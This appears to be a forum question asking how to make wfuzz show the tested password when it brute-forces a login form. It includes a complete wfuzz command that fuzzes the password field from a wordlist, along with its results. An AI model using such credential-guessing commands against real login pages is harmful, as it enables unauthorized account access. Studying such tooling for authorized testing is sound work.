Hi,
This is a simple question which must have been asked but I cannot find the answer. Using wfuzz to do a dictionary attack on a login page. How do you print the positive hits.
wfuzz -c -v -z file,/usr/share/wordlists/custom/john.txt -d "email=bob%40email.com&password=FUZZ" --hw 1 http://webpage.com/index.php
This is a test email and I know the password is password
. I get a positive hit
==================================================================================================================================================
ID C.Time Response Lines Word Chars Server Redirect
==================================================================================================================================================
000000003: 0.561s 302 0 L 0 W 0 Ch Apache/2.4.29 (Ubuntu) home.php
000001594: 0.238s 302 0 L 0 W 0 Ch Apache/2.4.29 (Ubuntu) home.php
Total time: 82.61772
Processed Requests: 3109
Filtered Requests: 3107
Requests/sec.: 37.63115
But how do I tell wfuzz to add a column with the password/FUZZ tested?
thanks